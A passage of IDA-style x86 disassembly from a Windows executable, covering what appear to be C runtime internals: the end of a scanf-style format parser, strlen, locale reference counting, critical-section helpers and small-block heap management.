loc_4199A3: ; CODE XREF: sub_419255+64E�j
mov [ebx], al
inc ebx
loc_4199A6: ; CODE XREF: sub_419255+6A3�j
mov [ebp+var_64], ebx
jmp loc_419821
; ---------------------------------------------------------------------------
loc_4199AE: ; CODE XREF: sub_419255+644�j
inc esi
jmp loc_419821
; ---------------------------------------------------------------------------
loc_4199B4: ; CODE XREF: sub_419255+5F1�j
; sub_419255+613�j ...
dec [ebp+var_30]
cmp eax, 0FFFFFFFFh
jz short loc_4199C7
push [ebp+arg_0]
push eax
call sub_41E71C
pop ecx
pop ecx
loc_4199C7: ; CODE XREF: sub_419255+5DA�j
; sub_419255+765�j
cmp esi, ebx
jz loc_419CC2
cmp [ebp+var_4B], 0
jnz loc_419C36
inc [ebp+var_34]
cmp [ebp+var_68], 63h
jz loc_419C36
mov eax, [ebp+var_64]
cmp [ebp+var_4D], 0
jz short loc_4199F8
and word ptr [eax], 0
jmp loc_419C36
; ---------------------------------------------------------------------------
loc_4199F8: ; CODE XREF: sub_419255+798�j
and byte ptr [eax], 0
jmp loc_419C36
; ---------------------------------------------------------------------------
loc_419A00: ; CODE XREF: sub_419255+441�j
mov [ebp+var_4F], 1
loc_419A04: ; CODE XREF: sub_419255+221�j
; sub_419255+233�j ...
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_419A12
mov [ebp+var_4A], 1
jmp short loc_419A17
; ---------------------------------------------------------------------------
loc_419A12: ; CODE XREF: sub_419255+7B5�j
cmp ebx, 2Bh
jnz short loc_419A35
loc_419A17: ; CODE XREF: sub_419255+7BB�j
dec [ebp+var_48]
jnz short loc_419A26
test ecx, ecx
jz short loc_419A26
mov [ebp+var_4C], 1
jmp short loc_419A35
; ---------------------------------------------------------------------------
loc_419A26: ; CODE XREF: sub_419255+7C5�j
; sub_419255+7C9�j
inc [ebp+var_30]
mov edx, esi
call sub_41923F
mov ebx, eax
loc_419A32: ; CODE XREF: sub_419255+723�j
mov [ebp+var_28], ebx
loc_419A35: ; CODE XREF: sub_419255+6CE�j
; sub_419255+70A�j ...
cmp [ebp+var_54], 0
jz loc_419B3A
cmp [ebp+var_4C], 0
jnz loc_419B18
loc_419A49: ; CODE XREF: sub_419255+8BA�j
cmp edi, 78h
jz short loc_419A94
cmp edi, 70h
jz short loc_419A94
push ebx
call sub_41E669
pop ecx
test eax, eax
jz short loc_419AC5
cmp edi, 6Fh
jnz short loc_419A7D
cmp ebx, 38h
jge short loc_419AC5
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 3
shl eax, 3
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp short loc_419AC8
; ---------------------------------------------------------------------------
loc_419A7D: ; CODE XREF: sub_419255+80C�j
push 0
push 0Ah
push [ebp+var_58]
push [ebp+var_5C]
call sub_4171B0
mov [ebp+var_5C], eax
mov [ebp+var_58], edx
jmp short loc_419AC8
; ---------------------------------------------------------------------------
loc_419A94: ; CODE XREF: sub_419255+7F7�j
; sub_419255+7FC�j
push ebx
call sub_41E6A3
pop ecx
test eax, eax
jz short loc_419AC5
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 4
shl eax, 4
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
push ebx
call sub_41E669
pop ecx
test eax, eax
jnz short loc_419AC8
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_419AC8
; ---------------------------------------------------------------------------
loc_419AC5: ; CODE XREF: sub_419255+807�j
; sub_419255+811�j ...
inc [ebp+var_4C]
loc_419AC8: ; CODE XREF: sub_419255+826�j
; sub_419255+83D�j ...
cmp [ebp+var_4C], 0
jnz short loc_419AFA
inc [ebp+var_40]
lea eax, [ebx-30h]
cdq
add [ebp+var_5C], eax
adc [ebp+var_58], edx
cmp [ebp+var_44], 0
jz short loc_419AEC
dec [ebp+var_48]
jnz short loc_419AEC
mov [ebp+var_4C], 1
jmp short loc_419B0B
; ---------------------------------------------------------------------------
loc_419AEC: ; CODE XREF: sub_419255+88A�j
; sub_419255+88F�j
inc [ebp+var_30]
mov edx, esi
call sub_41923F
mov ebx, eax
jmp short loc_419B0B
; ---------------------------------------------------------------------------
loc_419AFA: ; CODE XREF: sub_419255+877�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_419B0B
push esi
push ebx
call sub_41E71C
pop ecx
pop ecx
loc_419B0B: ; CODE XREF: sub_419255+895�j
; sub_419255+8A3�j ...
cmp [ebp+var_4C], 0
jz loc_419A49
mov [ebp+var_28], ebx
loc_419B18: ; CODE XREF: sub_419255+7EE�j
cmp [ebp+var_4A], 0
jz loc_419BF4
mov eax, [ebp+var_5C]
neg eax
mov ecx, [ebp+var_58]
adc ecx, 0
neg ecx
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp loc_419BF4
; ---------------------------------------------------------------------------
loc_419B3A: ; CODE XREF: sub_419255+7E4�j
cmp [ebp+var_4C], 0
jnz loc_419BEB
loc_419B44: ; CODE XREF: sub_419255+98D�j
cmp edi, 78h
jz short loc_419B76
cmp edi, 70h
jz short loc_419B76
push ebx
call sub_41E669
pop ecx
test eax, eax
jz short loc_419B98
cmp edi, 6Fh
jnz short loc_419B69
cmp ebx, 38h
jge short loc_419B98
shl [ebp+var_38], 3
jmp short loc_419B9B
; ---------------------------------------------------------------------------
loc_419B69: ; CODE XREF: sub_419255+907�j
mov eax, [ebp+var_38]
lea eax, [eax+eax*4]
shl eax, 1
mov [ebp+var_38], eax
jmp short loc_419B9B
; ---------------------------------------------------------------------------
loc_419B76: ; CODE XREF: sub_419255+8F2�j
; sub_419255+8F7�j
push ebx
call sub_41E6A3
pop ecx
test eax, eax
jz short loc_419B98
shl [ebp+var_38], 4
push ebx
call sub_41E669
pop ecx
test eax, eax
jnz short loc_419B9B
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_419B9B
; ---------------------------------------------------------------------------
loc_419B98: ; CODE XREF: sub_419255+902�j
; sub_419255+90C�j ...
inc [ebp+var_4C]
loc_419B9B: ; CODE XREF: sub_419255+912�j
; sub_419255+91F�j ...
cmp [ebp+var_4C], 0
jnz short loc_419BCD
inc [ebp+var_40]
mov eax, [ebp+var_38]
lea eax, [eax+ebx-30h]
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_419BBF
dec [ebp+var_48]
jnz short loc_419BBF
mov [ebp+var_4C], 1
jmp short loc_419BDE
; ---------------------------------------------------------------------------
loc_419BBF: ; CODE XREF: sub_419255+95D�j
; sub_419255+962�j
inc [ebp+var_30]
mov edx, esi
call sub_41923F
mov ebx, eax
jmp short loc_419BDE
; ---------------------------------------------------------------------------
loc_419BCD: ; CODE XREF: sub_419255+94A�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_419BDE
push esi
push ebx
call sub_41E71C
pop ecx
pop ecx
loc_419BDE: ; CODE XREF: sub_419255+968�j
; sub_419255+976�j ...
cmp [ebp+var_4C], 0
jz loc_419B44
mov [ebp+var_28], ebx
loc_419BEB: ; CODE XREF: sub_419255+8E9�j
cmp [ebp+var_4A], 0
jz short loc_419BF4
neg [ebp+var_38]
loc_419BF4: ; CODE XREF: sub_419255+8C7�j
; sub_419255+8E0�j ...
cmp edi, 46h
jnz short loc_419BFD
and [ebp+var_40], 0
loc_419BFD: ; CODE XREF: sub_419255+9A2�j
cmp [ebp+var_40], 0
jz loc_419CC2
cmp [ebp+var_4B], 0
jnz short loc_419C36
inc [ebp+var_34]
mov ebx, [ebp+var_64]
mov eax, [ebp+var_38]
loc_419C16: ; CODE XREF: sub_419255+259�j
cmp [ebp+var_54], 0
jz short loc_419C29
mov eax, [ebp+var_5C]
mov [ebx], eax
mov eax, [ebp+var_58]
mov [ebx+4], eax
jmp short loc_419C36
; ---------------------------------------------------------------------------
loc_419C29: ; CODE XREF: sub_419255+9C5�j
cmp [ebp+var_4F], 0
jz short loc_419C33
mov [ebx], eax
jmp short loc_419C36
; ---------------------------------------------------------------------------
loc_419C33: ; CODE XREF: sub_419255+9D8�j
mov [ebx], ax
loc_419C36: ; CODE XREF: sub_419255+25F�j
; sub_419255+3F1�j ...
inc [ebp+var_29]
inc [ebp+arg_4]
jmp short loc_419CA6
; ---------------------------------------------------------------------------
loc_419C3E: ; CODE XREF: sub_419255+90�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_41923F
mov ebx, eax
mov [ebp+var_28], ebx
movzx eax, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp eax, ebx
jnz short loc_419C8F
movzx eax, bl
mov ecx, off_432A40
test byte ptr [ecx+eax*2+1], 80h
jz short loc_419CA6
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_41923F
movzx ecx, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp ecx, eax
jz short loc_419CA3
cmp eax, 0FFFFFFFFh
jz short loc_419C8F
push [ebp+arg_0]
push eax
call sub_41E71C
pop ecx
pop ecx
loc_419C8F: ; CODE XREF: sub_419255+A02�j
; sub_419255+A2D�j
cmp ebx, 0FFFFFFFFh
loc_419C92: ; CODE XREF: sub_419255+471�j
jz short loc_419CC2
push [ebp+arg_0]
push [ebp+var_28]
call sub_41E71C
pop ecx
pop ecx
jmp short loc_419CC2
; ---------------------------------------------------------------------------
loc_419CA3: ; CODE XREF: sub_419255+A28�j
dec [ebp+var_30]
loc_419CA6: ; CODE XREF: sub_419255+9E7�j
; sub_419255+A12�j
cmp [ebp+var_28], 0FFFFFFFFh
jnz loc_419283
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 25h
jnz short loc_419CC2
cmp byte ptr [eax+1], 6Eh
jz loc_419283
loc_419CC2: ; CODE XREF: sub_419255+35�j
; sub_419255+3E7�j ...
cmp [ebp+var_24], 1
jnz short loc_419CD1
push [ebp+var_20]
call sub_416C97
pop ecx
loc_419CD1: ; CODE XREF: sub_419255+A71�j
mov eax, [ebp+var_34]
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_419CE6
test eax, eax
jnz short loc_419CE6
cmp [ebp+var_29], al
jnz short loc_419CE6
or eax, 0FFFFFFFFh
loc_419CE6: ; CODE XREF: sub_419255+A83�j
; sub_419255+A87�j ...
lea esp, [ebp-1E4h]
mov ecx, [ebp+var_1C]
xor ecx, [ebp+4]
call sub_41C526
call __SEH_epilog
retn
sub_419255 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419D00 proc near ; CODE XREF: sub_416AE4+17�p
; sub_417EE4+D2�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_419D30
loc_419D0C: ; CODE XREF: sub_419D00+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_419D63
test ecx, 3
jnz short loc_419D0C
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_419D30: ; CODE XREF: sub_419D00+A�j
; sub_419D00+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_419D30
mov eax, [ecx-4]
test al, al
jz short loc_419D81
test ah, ah
jz short loc_419D77
test eax, 0FF0000h
jz short loc_419D6D
test eax, 0FF000000h
jz short loc_419D63
jmp short loc_419D30
; ---------------------------------------------------------------------------
loc_419D63: ; CODE XREF: sub_419D00+13�j
; sub_419D00+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_419D6D: ; CODE XREF: sub_419D00+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_419D77: ; CODE XREF: sub_419D00+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_419D81: ; CODE XREF: sub_419D00+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_419D00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419D8B proc near ; CODE XREF: sub_416C0A+2A�p
; sub_41756A+37�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
cmp ecx, 100h
mov ecx, [ebp+arg_0]
ja short loc_419DA9
mov ecx, [ecx+48h]
movzx eax, word ptr [ecx+eax*2]
jmp short loc_419DFD
; ---------------------------------------------------------------------------
loc_419DA9: ; CODE XREF: sub_419D8B+13�j
push esi
mov edx, eax
sar edx, 8
push edi
mov edi, [ecx+48h]
movzx esi, dl
test byte ptr [edi+esi*2+1], 80h
pop edi
pop esi
jz short loc_419DCE
and [ebp+var_2], 0
push 2
mov [ebp+var_3], al
mov [ebp+var_4], dl
pop eax
jmp short loc_419DD8
; ---------------------------------------------------------------------------
loc_419DCE: ; CODE XREF: sub_419D8B+32�j
and [ebp+var_3], 0
mov [ebp+var_4], al
xor eax, eax
inc eax
loc_419DD8: ; CODE XREF: sub_419D8B+41�j
push 1
push dword ptr [ecx+14h]
push dword ptr [ecx+4]
lea ecx, [ebp+arg_4+2]
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_41E8E0
add esp, 1Ch
test eax, eax
jnz short loc_419DF9
leave
retn
; ---------------------------------------------------------------------------
loc_419DF9: ; CODE XREF: sub_419D8B+6A�j
movzx eax, word ptr [ebp+arg_4+2]
loc_419DFD: ; CODE XREF: sub_419D8B+1C�j
and eax, [ebp+arg_8]
leave
retn
sub_419D8B endp
; =============== S U B R O U T I N E =======================================
sub_419E02 proc near ; CODE XREF: sub_419ECC+B7�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+3Ch]
push edi
xor edi, edi
cmp eax, dword_481448
jz short loc_419E78
cmp eax, edi
jz short loc_419E78
mov eax, [esi+2Ch]
cmp [eax], edi
jnz short loc_419E78
mov eax, [esi+34h]
cmp eax, edi
jz short loc_419E43
cmp [eax], edi
jnz short loc_419E43
cmp eax, dword_4815C8
jz short loc_419E43
push eax
call sub_416C97
push dword ptr [esi+3Ch]
call sub_41EC89
pop ecx
pop ecx
loc_419E43: ; CODE XREF: sub_419E02+23�j
; sub_419E02+27�j ...
mov eax, [esi+30h]
cmp eax, edi
jz short loc_419E66
cmp [eax], edi
jnz short loc_419E66
cmp eax, dword_4815CC
jz short loc_419E66
push eax
call sub_416C97
push dword ptr [esi+3Ch]
call sub_41EC2A
pop ecx
pop ecx
loc_419E66: ; CODE XREF: sub_419E02+46�j
; sub_419E02+4A�j ...
push dword ptr [esi+2Ch]
call sub_416C97
push dword ptr [esi+3Ch]
call sub_416C97
pop ecx
pop ecx
loc_419E78: ; CODE XREF: sub_419E02+11�j
; sub_419E02+15�j ...
mov eax, [esi+40h]
cmp eax, dword_4815C4
jz short loc_419E9B
cmp eax, edi
jz short loc_419E9B
cmp [eax], edi
jnz short loc_419E9B
push eax
call sub_416C97
push dword ptr [esi+44h]
call sub_416C97
pop ecx
pop ecx
loc_419E9B: ; CODE XREF: sub_419E02+7F�j
; sub_419E02+83�j ...
mov eax, [esi+50h]
cmp eax, dword_481444
jz short loc_419EC2
cmp eax, edi
jz short loc_419EC2
cmp [eax+0B4h], edi
jnz short loc_419EC2
push eax
call sub_41EA9A
push dword ptr [esi+50h]
call sub_416C97
pop ecx
pop ecx
loc_419EC2: ; CODE XREF: sub_419E02+A2�j
; sub_419E02+A6�j ...
push esi
call sub_416C97
pop ecx
pop edi
pop esi
retn
sub_419E02 endp
; =============== S U B R O U T I N E =======================================
sub_419ECC proc near ; CODE XREF: sub_419F8E+18�p
push esi
call sub_41915F
mov esi, eax
mov eax, [esi+64h]
cmp eax, off_4323DC
jz loc_419F89
test eax, eax
jz short loc_419F16
mov ecx, [eax+2Ch]
dec dword ptr [eax]
test ecx, ecx
jz short loc_419EF2
dec dword ptr [ecx]
loc_419EF2: ; CODE XREF: sub_419ECC+22�j
mov ecx, [eax+34h]
test ecx, ecx
jz short loc_419EFB
dec dword ptr [ecx]
loc_419EFB: ; CODE XREF: sub_419ECC+2B�j
mov ecx, [eax+30h]
test ecx, ecx
jz short loc_419F04
dec dword ptr [ecx]
loc_419F04: ; CODE XREF: sub_419ECC+34�j
mov ecx, [eax+40h]
test ecx, ecx
jz short loc_419F0D
dec dword ptr [ecx]
loc_419F0D: ; CODE XREF: sub_419ECC+3D�j
mov ecx, [eax+4Ch]
dec dword ptr [ecx+0B4h]
loc_419F16: ; CODE XREF: sub_419ECC+19�j
mov ecx, off_4323DC
mov [esi+64h], ecx
mov ecx, off_4323DC
inc dword ptr [ecx]
mov ecx, off_4323DC
mov ecx, [ecx+2Ch]
test ecx, ecx
jz short loc_419F36
inc dword ptr [ecx]
loc_419F36: ; CODE XREF: sub_419ECC+66�j
mov ecx, off_4323DC
mov ecx, [ecx+34h]
test ecx, ecx
jz short loc_419F45
inc dword ptr [ecx]
loc_419F45: ; CODE XREF: sub_419ECC+75�j
mov ecx, off_4323DC
mov ecx, [ecx+30h]
test ecx, ecx
jz short loc_419F54
inc dword ptr [ecx]
loc_419F54: ; CODE XREF: sub_419ECC+84�j
mov ecx, off_4323DC
mov ecx, [ecx+40h]
test ecx, ecx
jz short loc_419F63
inc dword ptr [ecx]
loc_419F63: ; CODE XREF: sub_419ECC+93�j
mov ecx, off_4323DC
mov ecx, [ecx+4Ch]
inc dword ptr [ecx+0B4h]
test eax, eax
jz short loc_419F89
cmp dword ptr [eax], 0
jnz short loc_419F89
cmp eax, offset dword_432388
jz short loc_419F89
push eax
call sub_419E02
pop ecx
loc_419F89: ; CODE XREF: sub_419ECC+11�j
; sub_419ECC+A8�j ...
mov eax, [esi+64h]
pop esi
retn
sub_419ECC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419F8E proc near ; CODE XREF: sub_416C0A+12�p
; sub_417456+24�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_42C0A8
call __SEH_prolog
push 0Ch
call sub_41A166
pop ecx
and [ebp+ms_exc.disabled], 0
call sub_419ECC
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_419FC0
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_419F8E endp
; =============== S U B R O U T I N E =======================================
sub_419FC0 proc near ; CODE XREF: sub_419F8E+24�p
; DATA XREF: .text:stru_42C0A8�o
push 0Ch
call sub_41A0D2
pop ecx
retn
sub_419FC0 endp
; =============== S U B R O U T I N E =======================================
sub_419FC9 proc near ; CODE XREF: sub_419FE3+20�p
cmp dword_481164, 2
jnz short loc_419FDF
cmp dword_481170, 5
jb short loc_419FDF
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_419FDF: ; CODE XREF: sub_419FC9+7�j
; sub_419FC9+10�j
push 3
pop eax
retn
sub_419FC9 endp
; =============== S U B R O U T I N E =======================================
sub_419FE3 proc near ; CODE XREF: .text:004186FC�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call dword_42218C ; HeapCreate
test eax, eax
mov dword_482960, eax
jz short loc_41A02D
call sub_419FC9
cmp eax, 3
mov dword_482964, eax
jnz short loc_41A030
push 3F8h
call sub_41A197
test eax, eax
pop ecx
jnz short loc_41A030
push dword_482960
call dword_422188 ; HeapDestroy
loc_41A02D: ; CODE XREF: sub_419FE3+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41A030: ; CODE XREF: sub_419FE3+2D�j
; sub_419FE3+3C�j
xor eax, eax
inc eax
retn
sub_419FE3 endp
; =============== S U B R O U T I N E =======================================
sub_41A034 proc near ; CODE XREF: sub_4191D0�p
push esi
push edi
xor esi, esi
mov edi, offset dword_4811C0
loc_41A03D: ; CODE XREF: sub_41A034+35�j
cmp dword_43251C[esi*8], 1
jnz short loc_41A065
lea eax, ds:432518h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_41EF60
test eax, eax
pop ecx
pop ecx
jz short loc_41A071
loc_41A065: ; CODE XREF: sub_41A034+11�j
inc esi
cmp esi, 24h
jl short loc_41A03D
xor eax, eax
inc eax
loc_41A06E: ; CODE XREF: sub_41A034+47�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A071: ; CODE XREF: sub_41A034+2F�j
and dword_432518[esi*8], 0
xor eax, eax
jmp short loc_41A06E
sub_41A034 endp
; =============== S U B R O U T I N E =======================================
sub_41A07D proc near ; CODE XREF: sub_419141�p
push ebx
mov ebx, dword_422024
push esi
mov esi, offset dword_432518
push edi
loc_41A08B: ; CODE XREF: sub_41A07D+30�j
mov edi, [esi]
test edi, edi
jz short loc_41A0A4
cmp dword ptr [esi+4], 1
jz short loc_41A0A4
push edi
call ebx ; RtlDeleteCriticalSection
push edi
call sub_416C97
and dword ptr [esi], 0
pop ecx
loc_41A0A4: ; CODE XREF: sub_41A07D+12�j
; sub_41A07D+18�j
add esi, 8
cmp esi, offset off_432638
jl short loc_41A08B
mov esi, offset dword_432518
pop edi
loc_41A0B5: ; CODE XREF: sub_41A07D+50�j
mov eax, [esi]
test eax, eax
jz short loc_41A0C4
cmp dword ptr [esi+4], 1
jnz short loc_41A0C4
push eax
call ebx ; RtlDeleteCriticalSection
loc_41A0C4: ; CODE XREF: sub_41A07D+3C�j
; sub_41A07D+42�j
add esi, 8
cmp esi, offset off_432638
jl short loc_41A0B5
pop esi
pop ebx
retn
sub_41A07D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A0D2 proc near ; CODE XREF: sub_416CEA+2�p
; sub_416D7A+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push dword_432518[eax*8]
call dword_422014 ; RtlLeaveCriticalSection
pop ebp
retn
sub_41A0D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A0E7 proc near ; CODE XREF: sub_41A166+14�p
; sub_41B9BA+4F�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
lea esi, ds:432518h[esi*8]
cmp dword ptr [esi], 0
jz short loc_41A0FF
xor eax, eax
inc eax
jmp short loc_41A163
; ---------------------------------------------------------------------------
loc_41A0FF: ; CODE XREF: sub_41A0E7+11�j
push edi
push 18h
call sub_416DAF
mov edi, eax
test edi, edi
pop ecx
jnz short loc_41A11D
loc_41A10E: ; CODE XREF: sub_41A0E7+63�j
call sub_41B935
mov dword ptr [eax], 0Ch
xor eax, eax
jmp short loc_41A162
; ---------------------------------------------------------------------------
loc_41A11D: ; CODE XREF: sub_41A0E7+25�j
push 0Ah
call sub_41A166
cmp dword ptr [esi], 0
pop ecx
jnz short loc_41A150
push 0FA0h
push edi
call sub_41EF60
test eax, eax
pop ecx
pop ecx
jnz short loc_41A14C
push edi
call sub_416C97
push 0Ah
call sub_41A0D2
pop ecx
pop ecx
jmp short loc_41A10E
; ---------------------------------------------------------------------------
loc_41A14C: ; CODE XREF: sub_41A0E7+52�j
mov [esi], edi
jmp short loc_41A157
; ---------------------------------------------------------------------------
loc_41A150: ; CODE XREF: sub_41A0E7+41�j
push edi
call sub_416C97
pop ecx
loc_41A157: ; CODE XREF: sub_41A0E7+67�j
push 0Ah
call sub_41A0D2
xor eax, eax
pop ecx
inc eax
loc_41A162: ; CODE XREF: sub_41A0E7+34�j
pop edi
loc_41A163: ; CODE XREF: sub_41A0E7+16�j
pop esi
pop ebp
retn
sub_41A0E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A166 proc near ; CODE XREF: sub_416C97+1E�p
; sub_416D08+22�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
lea esi, ds:432518h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_41A18C
push eax
call sub_41A0E7
test eax, eax
pop ecx
jnz short loc_41A18C
push 11h
call sub_4185EA
pop ecx
loc_41A18C: ; CODE XREF: sub_41A166+11�j
; sub_41A166+1C�j
push dword ptr [esi]
call dword_422018 ; RtlEnterCriticalSection
pop esi
pop ebp
retn
sub_41A166 endp
; =============== S U B R O U T I N E =======================================
sub_41A197 proc near ; CODE XREF: sub_419FE3+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_482960
call dword_42205C ; RtlAllocateHeap
test eax, eax
mov dword_48294C, eax
jnz short loc_41A1B4
retn
; ---------------------------------------------------------------------------
loc_41A1B4: ; CODE XREF: sub_41A197+1A�j
mov ecx, [esp+arg_0]
and dword_482944, 0
and dword_482948, 0
mov dword_482954, eax
xor eax, eax
mov dword_482950, ecx
mov dword_482958, 10h
inc eax
retn
sub_41A197 endp
; =============== S U B R O U T I N E =======================================
sub_41A1DF proc near ; CODE XREF: sub_416C97+29�p
; sub_416F93+5B�p ...
arg_0 = dword ptr 4
mov eax, dword_482948
lea ecx, [eax+eax*4]
mov eax, dword_48294C
lea ecx, [eax+ecx*4]
jmp short loc_41A203
; ---------------------------------------------------------------------------
loc_41A1F1: ; CODE XREF: sub_41A1DF+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_41A209
add eax, 14h
loc_41A203: ; CODE XREF: sub_41A1DF+10�j
cmp eax, ecx
jb short loc_41A1F1
xor eax, eax
locret_41A209: ; CODE XREF: sub_41A1DF+1F�j
retn
sub_41A1DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A20A proc near ; CODE XREF: sub_416C97+38�p
; sub_416F93+B8�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_41A51E
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_41A2D5
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41A26D
push 3Fh
pop edx
loc_41A26D: ; CODE XREF: sub_41A20A+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41A2B7
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_41A298
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41A2B4
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41A2B4
; ---------------------------------------------------------------------------
loc_41A298: ; CODE XREF: sub_41A20A+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41A2B4
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41A2B4: ; CODE XREF: sub_41A20A+85�j
; sub_41A20A+8C�j ...
mov ebx, [ebp+arg_4]
loc_41A2B7: ; CODE XREF: sub_41A20A+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_41A2D5: ; CODE XREF: sub_41A20A+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41A2E3
push 3Fh
pop edx
loc_41A2E3: ; CODE XREF: sub_41A20A+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_41A381
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_41A308
mov ebx, esi
loc_41A308: ; CODE XREF: sub_41A20A+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_41A31A
mov edx, esi
loc_41A31A: ; CODE XREF: sub_41A20A+10C�j
cmp ebx, edx
jz short loc_41A37C
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_41A364
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_41A34A
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41A364
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_41A364
; ---------------------------------------------------------------------------
loc_41A34A: ; CODE XREF: sub_41A20A+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41A364
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_41A364: ; CODE XREF: sub_41A20A+11D�j
; sub_41A20A+137�j ...
